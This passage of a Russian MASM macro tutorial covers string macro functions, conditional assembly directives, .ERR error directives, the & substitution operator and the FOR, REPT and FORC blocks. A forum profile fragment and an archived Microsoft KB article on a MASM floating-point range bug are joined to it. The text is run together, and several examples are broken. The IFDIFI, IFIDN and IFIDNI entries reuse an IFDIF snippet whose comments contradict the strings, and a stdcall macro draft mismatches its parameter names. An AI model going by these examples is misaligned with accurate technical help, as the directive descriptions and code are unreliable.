%echo @CatStr(<my>,var) Вывод:Myvar@InStr( [[position]], string1, string2 ), макрофункция Возвращает позицию вхождения строки string2 в строку string1. Если параметр
position определён, тогда поиск начинается именно с этой позиции. Отсчёт
позиции начинается с единицы. В случае, если вхождение не найдено макрофункция
возвращает значение 0. Параметр position должен быть целым числом больше
нуля, но не равным нулю.Пример:
%echo @InStr(1,asdfg,s) Вывод:02@SizeStr( string ) макрофункция Возвращает число, характеризующее длину строки, или, что тоже самое
количество символов в строке. Функция возвращает число, однако, поскольку
это макрофункция то тип возвращаемого значения – строка.@SubStr( string, position [[, length]] ) макрофункция Возвращает подстроку строки string, начиная с позиции, указанной в параметре
position (отсчёт начинается с 1). Если необязательный параметр length задан,
он ограничивает размер возвращаемой строки. Параметр length не может быть
меньше нуля, и не может быть строкой.Пример:
%echo @SubStr(1234567890,2) %echo @SubStr(1234567890,1,5) Вывод: 234567890 12345Информация о сегментах @code, строковая макропеременная Возвращает имя сегмента кода. @data, строковая макропеременная Возвращает модель памяти.
Пример:
%echo data = @data Вывод:data = FLAT@fardata?, строковая макропеременная Равен имени сегмента FARDATA? @WordSize, численная константа Содержит размер слова в байтах.
Для 16-bits – 2.
Для 32-bits – 4.@CodeSize, численная константа Содержит идентификатор типа памяти.
0 – TINY, SMALL, COMPACT, FLAT.
1
– MEDIUM, LARGE, HUGE@Model, численная константа 1 – TINY
2 – SMALL
3 – COMPACT
4 – MEDIUM
5
– LARGE
6 – HUGE
7 – FLAT@CurSeg, строковая макропеременная Хранит имя текущего сегмента. @fardata, @stack, строковая макропеременная Содержат соответствующие имена сегментов Кроме знания макрофункций, нам так же понадобятся знания о блоках ветвлений
или просто IF блоках. Эти блоки позволяют исполнять тот или иной участок исходного
кода в зависимости от того, выполняется какое-либо условие или нет. Часто это
называют «Условным ассемблированием (компиляцией)», однако для MASM это нечто
большее, нежели простое управление компилятором, так как, вы уже поняли, мы
имеем дело, как с кодом машины, так и с макрокодом, который вычисляется и живёт
только во время компиляции.Условный блок в MASM имеет следующий общий вид:
[IFDIRECTIVE] условие
...
[ELSEDIRECTIVE] условие
...
ELSE
...
ENDIFЕсли выражение «Условие» равно истине, то выполняется блок кода, идущий после
условной директивы, иначе управление передаётся на следующий оператор за блоком.
[IFDIRECTIVE]/[ELSEDIRECTIVE] – могут быть той или иной директивой
условия. Стандартные директивы IF/ELSEIF/ELSE требуют,
чтобы выражение, стоящее при них, было целочисленным. Если вам необходимо проверять
другие условия, то для этого
в MASM предусмотрены специальные директивы.Список [IFDIRECTIVE]/[ELSEDIRECTIVE]:
Блок Условие выполнения блока IF выражение
ELSEIF выражение
ELSEесли выражение равно истине IF1
ELSEIF1если ассемблер выполняет первый проход IF2
ELSEIF2если ассемблер выполняет второй проход (устарело) IFE выражение
ELSEIFE выражениеесли выражение равно нулю IFDEF выражение
ELSEIFDEF выражениеесли идентификатор, который является результатом выражения, определен.
Идентификатором может быть макро, макропеременная, переменная, макроконстанта,
любой другой идентификатор.При помощи этой директивы, можно проверить была ли определена та или
иная переменная, макро, константа.IFDEF PROGRAM_IMAGE_BASE
;; Выполняем действия если PROGRAM_IMAGE_BASE
;; определена
ELSE
…IFNDEF выражение
ELSEIFNDEF выражениеесли идентификатор не определён. IFB строка
ELSEIFB строкаесли строка пустая.
Строка считается пустой, если её длинна равна нулю,
либо она содержит одни пробелы. С помощью этой директивы можно определяет
присутствие/отсутствие необязательных макропараметров.MyMacro macro param1,param2
IFB <param2>
;; Если макропараметр не определён,
;; генерируем ошибку
.ERR <Не определён параметр param2>IFNB строка
ELSEIFNB строкаесли строка не пуста. IFDIF str1,str2
ELSEIFDIF str1,str2если строки различны.
IFDIF <String>,<string> echo Этот код выполнится echo потому что строки различны ENDIFIFDIFI str1,str2
ELSEIFDIFI str1,str2если строки различны (без учёта различий в регистре букв).
IFDIF <String1>,<string2>
echo Этот код не выполнится
echo потому что строки Одинаковы
ENDIFIFIDN str1,str2
ELSEIFIDN str1,str2если строки одинаковы.
IFDIF <String1>,<string2>
echo Этот код не выполнится
echo потому что строки Различны
ENDIFIFIDN str1,str2
ELSEIFIDN str1,str2если строки одинаковы (без учёта различий в регистре букв).
IFDIF <String1>,<string2>
echo Этот код выполнится
echo потому что строки Одинаковы
ENDIFНа протяжении всей статьи я часто пользовался следующей директивой, которая
позволяет выводить текст на консоль во время компиляции. Эта директива echo.
Как мы узнаем позже, она оказалось просто незаменимой при проектировании макро.Вы уже, наверное, убедились насколько полезна эта директива, позволяющая
заглянуть, а что именно происходит в недрах макроса, или посмотреть значения
макропеременных.Кроме этого, есть ещё одна группа директив, без которой мы не сможем обойтись.
Не сможем потому, что макрофункции, или макросы, которые мы собираемся создавать
должны быть слегка умными, иначе говоря, иметь «защиту от дурака».Если кто-то неправильно использует макрос, то код, полученный таким образом
может быть неправильным с точки зрения программиста, но не вызовет подозрений
у компилятора.
Поэтому макро не просто должен завершится, а и каким-то образом остановить
компиляцию программы с выдачей сообщения об ошибке.Именно для этого и существует простой набор директив условной генерации
ошибки. Действуют они подобно условным блокам и директиве echo. Пример
безусловной
генерации ошибки:.ERR <Ошибочка вышла, гражданин начальник>Условная генерация ошибки, имеют ту же форму, что и IFDIRECTIVE в таблице
выше, однако последним дополнительным параметром является строка сообщения.
Например:.ERRE выражение,<ошибка, если выражение равно нулю>
.ERRNZ выражение,<ошибка, если выражение не равно нулю>
.ERRDEF id,<ошибка, если id определен>
.ERRB строка,<ошибка, если строка пуста>
.ERRNB строка,<ошибка, если строка не пуста>
.ERRDIF str1,str2,<ошибка, если строки различны>
.ERRDIFI str1,str2,<ошибка, если строки различны (без учёта регистра)>
.ERRIDN str1,str2,<ошибка, если строки одинаковы>
.ERRIDNI str1,str2,<ошибка, если строки одинаковы (без учёта регистра)>III.7. Символ макроподстановки
Ещё раз вернёмся к формальным параметрам макро. Как было сказано, при раскрытии
макроопределения препроцессор заменяет в теле макро формальные названия на
их величины. В MASM32 предусмотрено ещё одно средство подстановки макропараметров
– внутри строкового литерала.Предположим нам нужно, чтобы макро генерировал строку: «label_xx». Где xx – это формальный параметр макро. Это можно сделать двумя способами:
@CatStr(label_,xx) ;;Вызов макрофункции конкантенации строк или
label_&xx& ;;Использование символа макроподстановкиТо есть если во время генерации макро, препроцессор встречает в его теле символ
«&», он анализирует строку после него. Если эта строка однозначно определяет
один из макропараметров, препроцессор заменяет выражение &макропараметр& на
значение макропараметра.Следует отметить, что если макропараметр начинает или заканчивает литерал,
то
можно использовать только один символ «&»:label_&xx
;;или ещё пример
label_&xx&&xx2 ;; Замена для двух макропараметров xx и xx2III.8. Макроблоки
И, наконец, у читателя должен остаться единственный вопрос: «А как обрабатывать
переменные типа VARARG»? Например, рассмотрим возможный макро для вызова функций
– STDCALL:stdcall macro funname,params:VARARG endmЭтот макро должен генерировать код вызова функции согласно конвенции STDCALL:
- Поместить параметры в стек в обратном порядке их определению.
- Вызвать функцию funname, предварительно видоизменив её имя по правилам
STDCALL.Получить видоизмененное имя функции по значению параметра funname можно
было бы при помощи символа макроподстановки.call _&funname@(количество параметров * 4)Но непонятно, как распознать параметры функции, которые представляют собой
строку, где значения разделены символом «,». Более того, не понятно,
как вообще можно получить эти параметры, и посчитать их число, ведь макропараметр
params – это одна строка. То есть при вызове макро:stdcall win32fun,1,2,3Мы должны как-то определить количество параметров, а потом их значения.
Именно для решения этой задачи в MASM предусмотрены несколько специальных
макроопределений, которые можно назвать макроблоками.Первый из них FOR позволяет получить значения элементов, разделённых в строке
символом «,».FOR parameter[:REQ | :=default], string
statements
ENDMВспоминая С конструкцию FOR, вы сразу поймёте что это цикл, где значение parameter последовательно принимает значения элементов списка string.
Вот вам wonderful пример:
FOR parameter, <It’s, wonderful, wonderful, asm>
echo parameter
ENDM
ВЫВОД:
-=-=-=-=-=-=
It's
wonderful
wonderful
asm
-=-=-=--=-=-А вот пример макрофункции, который подсчитывает число аргументов VARARG:
@ArgCount MACRO parmlist:VARARG
count = 0
FOR param, <parmlist>
count = count + 1
ENDM
EXITM count
ENDMВот в принципе, уже на основе этих знаний можно было бы организовать макрос
stdcall:stdcall macro funname,params:VARARG
count = 0
FOR param, <parmlist>
count = count + 1 ;; Считаем число параметров
push param ;; Помещаем их в стек
ENDM
;;Вызываем функцию
call ??? ;;А вот как это сделать?
endmЕщё несколько минут необходимо для того, чтобы понять, что этот макро работает
неправильно. Хотя бы потому, что параметры помещаются в стек не так. Нужно
было бы помещать их от последнего к первому, а не от первого к последнему.
А, кроме того, ведь символ макроподстановки нельзя употреблять к макропеременной
count, потому что это не макропараметр, это макропеременная.К сожалению, в MASM нет обратной конструкции FOR. Поэтому самый простой выход,
который напрашивается сам собой – это изменить порядок параметров в списке,
а потом только генерировать команды push.Вторую проблему можно легко решить, воспользовавшись макрофункцией конкатенации
строк:call @CatStr(_,funname,@,%(count*4))С параметрами в стек будет посложнее. В принципе я бы решил эту задачу, если
бы MASM поддерживал бы такой тип макропеременных как массив. Но хотя MASM и
не поддерживает этот тип, его можно эмулировать.count = 0
FOR param, <paramlist>
count = count + 1 ;; Считаем число параметров
@CatStr(var,%count) TEXTEQU <param>
ENDMКак вы можете догадаться, в этом примере создаются макропеременные varXX,
которым присваиваются значения параметров. Теперь с той же лёгкостью можно
работать с этими переменными. Можно снова использовать цикл FOR, однако в данном
случае, было бы грамотней воспользоваться значением count, и выполнить цикл
столько раз, сколько записано в нашем счётчике параметров. Для этого мы воспользуемся
ещё одним макроблоком rept, о котором скажем позже:nparams = count REPT nparams ;; Начало блока push @CatStr(var,%count) count = count - 1 ENDMБлок REPT выполняется столько раз, сколько указано в nparams. Я ввёл эту дополнительную
макропеременную, для того, чтобы значение, указанное в REPT осталось неизменным.
Однако этого не нужно. Можно было бы написать и так:REPT count ;; Начало блока
push @CatStr(var,%count)
count = count - 1
ENDMЗначение макропеременной count инициализирует цикл только один раз вначале,
после чего, она может, как угодно менять значение.И ещё один макроблок, без которого нам невозможно будет реализовать макрос
для определения строк уникода, или макрос, который позволяет писать строки
OEM в
редакторе использующий кодировку win cp-1251 (например, при создании консольных
приложений).Этот макроблок FORC:
FORC char, string
;;блок
ENDMБлок FORC выполняется столько раз, сколько символов в строке string, при этом
макропараметр char равен текущему символу из строки.
Например, посчитать количество символов в строке можно было бы так:count = 0
FORC char, <Сколько тут символов?>
count = count + 1
ENDM
%echo @CatStr(%count)А вот так, можно было бы посчитать количество пробельных символов.
count = 0
FORC char, <Сколько тут символов?>
IFB <char>
count = count + 1
ENDIF
ENDM
%echo @CatStr(%count)Упражнение:
TheSvin‘у, как и любому программисту, который часто имеет дело с битами,
было бы удобно записывать значения бит по группам, через пробел.;;Вот так неудобно и ненаглядно mov eax,011110111011b ;;Вот так удобно и наглядно, но компилятор выдаст ошибку ;;Вариант1 mov eax, 0111 101 1101 1b ;;А вот так вообще замечательно, только ML неправильно поймёт ;;Вариант2 mov eax, [0111] [101] [1101] [1]bХорошо бы было написать некую макрофункцию, которая смогла бы позволить записывать
эти выражения:mov eax,nf(0111 101 1101 1b)Напишите такую макрофункцию, которая позволила бы это делать. Напишите её
для первого и второго вариантов исполнения.III.9. Отладка макроопределений и заключение
А напоследок… остаётся маленькая деталь.
И эта деталь не самая приятная. Отладка макроопределений и их испытания невозможны
под отладчиком. А, кроме того, если при генерации макро возникает ошибка,
то ML выдаёт её в жутком виде:.start.asm(84) : error A2008: syntax error : in directive
MacroLoop(3): iteration 8: Macro Called From
.start.asm(84): Main Line CodeТо есть он выдаёт относительную строку в макро MacroLoop(3), где эта ошибка
появилась. А если ещё макровызовы будут вложенными, то вам лучше не видеть
этой замечательной картины.Единственной возможностью качественно и относительно легко отлаживать макро
– это употребление директивы echo.На протяжении статьи вы не раз наблюдали примеры её использования. Но я снова
повторюсь:;; Для макропараметров
echo macroparam
;; Для макропеременных типа строка или текстовых макро
%echo macrovar_string
;; Для целочисленных макропеременных, или макроконстант
%echo @CatStr(%macro_num)Заметьте, чтобы вывести значение целочисленной макропеременной необходимо
воспользоваться макрофункцией @CatStr(), и перед аргументом указать оператор
%. Почему именно так обсуждалась в пункте III.2. Определение макро переменных
и строк.Теперь вы знакомы с теорией использования макроопределений в MASM32, и сможете
смело приступать к разработке макро. Именно этим мы и займёмся в следующей
практической части нашего руководства, а так же заполним некоторые пробелы,
на которые не
обратили внимания здесь.III.10. Абстрактный алгоритм анализа строки MASM (Дополнение)
1. Определены таблицы элементов:
Таблица переменных Хранит сведения о всех переменных модуля Таблица меток Хранит список меток в коде. Таблица процедур Хранит таблицу и прототип процедур Список ключевых слов KEYLIST Хранит список ключевых слов, на которые реагирует ML Таблица макрофункций Хранит тело всех макро, их имена и тип: макрофункция, или макро. Список
макропараметровТаблица макросов -=- Таблица макропеременных, или переменных времени компиляции Хранит тип макропеременной и её значение. Всё остальное, что не включено 2. Начальное состояние анализа строки.
3. Читать поток символов, пока не встретится символ возврата каретки без предыдущего
символа «/». Игнорировать часть строки после «;»a. Определить наличие лексем первого уровня в строке:
i. Выделить все строковые литералы в кавычках, если только это не
выражение с TEXTEQU и символ комментария «;»
ii. Строковые литералы: <текст>
iii. Численные литералы: 1234, 1234h, 01011b
iv. Правильные литералы: строка из символов «A-Z,a-z,_0-9», но не
начинающаяся на цифру
v. Литералы разделители: «,.»
vi. Управляющие Литералы: «+-*» Правильные литералы: строка из символов
«A-Z,a-z,_0-9», но не начинающаяся на цифруb. Проверить правильные литералы на совпадение в списке ключевых слов,
и определить схему выражения. В зависимости от схемы выражения, выполнить
или
пропустить:i. Проверить правильные литералы на совпадение в списке макро (в зависимости
от способа вызова в списке макрофункций, или макросов)
ii. Проверить на наличие имени правильного литерала в таблице макропеременных.
iii. Осуществить вызов и замену макро и макропеременных, в соответствии
с выражением строки.
iv. Вычислить все выражения допустимые в ML (+-*).c. Осуществить разбор схемы.
i. Если это определение процедуры, записать в таблице процедур имя
и прототип новой процедуры
ii. Если это макроопределение: анализировать его тело. Если найден
возвращаемый параметр, записать макроопределение в таблицу макрофункций,
иначе в таблицу
макросов.
iii. Если это определение EQU вычислить правую часть.1. Если эта макропеременная уже есть в таблице макропеременных,
и её тип – числовой, выдать ошибку. Если эта макропеременная
имеет строковый
тип,
изменить
строку, на которую указывает свойство value этой макропеременной.
2. Если правая часть числовой литерал – записать EQU определение
в таблицу, и пометить его тип как числовой константы. Записать
в свойство
макропеременной
value значение указателя на строку. Записать свойство value
равным числу.
3. иначе EQU – переменная, имеющая указатель на строку. Записать
в значения свойства value указатель на строку.iv. Если это выражение с «=» или подобное, выполнить замену
всех литералов на макроконстанты, переменные, вызов всех
макрофункций,
и только потом
выполнять выражение.4. Перейти к анализу следующей строки.
archive
New Member
- Регистрация:
- 27 фев 2017
- Публикаций:
- 532
From BetaArchive Wiki
Jump to:navigation, search
Article ID: 72791
Article Last Modified on 11/19/2003
- Microsoft Macro Assembler 6.0 Standard Edition
- Microsoft Macro Assembler 6.0a
- Microsoft Macro Assembler 6.0b
This article was previously published under Q72791
SYMPTOMS
The Microsoft Macro Assembler (MASM) may fail to generate an error when a floating-point value is outside the range of the minimum allowable values.
As documented on page 142 of the «Microsoft Macro Assembler Programmer’s Guide» included with version 6.0, the limits when using the 4-byte REAL4 (or DD), 8-byte REAL8 (or DQ), or the 10-byte REAL10 (or DT) are as follows:
Size Low High ---- --- ---- 4 byte 1.18E-38 3.40E+38 8 byte 2.23E-308 1.79E+308 10 byte 3.37E-4932 1.18E+4932
However, MASM versions 5.1, 5.1a, 6.0, 6.0a, and 6.0b fail to generate an error when exceeding the low end of this range until a value of 3.37E-32752 or smaller for the 4 and 8-byte types and a value of 3.37E-32746 or smaller for the 10-byte type.
STATUS
Microsoft has confirmed this to be a problem in MASM versions 5.1, 5.1a, 6.0, 6.0a, and 6.0b. This problem was corrected in MASM for MS-DOS version 6.1.
MORE INFORMATION
The sample program below may be used to illustrate this problem. In the code, two of each of the 4-, 8-, and 10-byte data types are declared and initialized. For each type, one initializing value is used that correctly causes an error, while the other similar initializing value fails to cause an error, even though it should.
The declaration of n1, n3, and n5 correctly result in the following error in MASM version 6.0, 6.0a, and 6.0b:
error A2071: initializer magnitude too large for specified size
MASM versions 5.1 and 5.1a are not as explicit in their error message, but they correctly generate the following overflow error for n1, n3, and n5:
error A2029: division by 0 or overflow
Neither MASM version 5.1, 5.1a, 6.0, 6.0a, or 6.0b generates an error (as they should) on the declaration of n2, n4, and n6. (These versions fail to produce the expected error for any number smaller than the values listed above for each data type.)
Sample Code
; Assemble options needed: none .MODEL large .STACK 4096 .DATA n1 DD 1.18E-32752 ;Causes error n2 DD 1.18E-32751 ;Should cause error, but doesn't n3 DQ 2.23E-32752 ;Causes error n4 DQ 2.23E-32751 ;Should cause error, but doesn't n5 DT 3.37E-32746 ;Causes error n6 DT 3.37E-32745 ;Should cause error, but doesn't .CODE start: mov ax, 4C00h int 21h END start
Additional query words: 5.10 5.10a 6.00 6.00a 6.00b buglist6.00 buglist6.00a buglist6.00b fixlist6.10
Keywords: kbfix KB72791